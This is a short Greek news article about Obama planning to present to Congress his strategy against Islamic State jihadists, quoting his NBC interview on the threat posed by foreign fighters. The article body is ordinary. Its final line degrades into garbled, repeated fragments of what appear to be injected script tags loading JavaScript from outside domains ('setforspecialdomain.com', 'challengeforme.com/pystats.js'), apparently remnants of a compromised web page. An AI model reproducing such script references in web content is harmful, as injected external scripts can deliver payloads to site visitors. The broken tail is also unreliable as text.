Την Τετάρτη θα παρουσιάσει ο Ομπάμα την στρατηγική του για την αντιμετώπιση των τζιχαντιστών Πηγή: Την Τετάρτη θα παρουσιάσει ο Ομπάμα την στρατηγική του για την αντιμετώπιση των τζιχαντιστών

Την Τετάρτη θα παρουσιάσει ο Ομπάμα την στρατηγική του για την αντιμετώπιση των τζιχαντιστών

Ο Μπαράκ Ομπάμα θα παρουσιάσει την Τετάρτη στο Κογκρέσο τη στρατηγική του για την αντιμετώπιση των τζιχαντιστών του ΙΚ, που θα μπορούσαν, όπως ανέφερε να εξελιχθούν σε απειλή για τις ΗΠΑ.

Ο Ομπάμα στην ομιλία του έχει στόχο να «περιγράψει ποιο θα είναι το σχέδιο» και την Τρίτη θα συναντήσει τους ηγέτες του Κογκρέσου για να τους ζητήσει τη στήριξή τους.

«Θέλω απλά ο αμερικανικός λαός να καταλάβει τη φύση της απειλής και με ποιον τρόπο θα την αντιμετωπίσουμε και να έχει εμπιστοσύνη ότι θα μπορέσουμε να την αντιμετωπίσουμε», είπε ο Ομπάμα σε συνέντευξή του στο NBC, ενώ ανέφερε πως δεν υπάρχουν πληροφορίες για απειλές στις ΗΠΑ.

Σύμφωνα με τον Ομπάμα η οργάνωση έχει προσελκύσει ξένους τζιχαντιστές από δυτικές χώρες, οι οποίοι θα μπορούσαν να ταξιδέψουν στη χώρα του ανενόχλητοι. «Συν τω χρόνω, αυτό θα μπορούσε να εξελιχθεί σε σοβαρή απειλή για την πατρίδα», σημείωσε.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >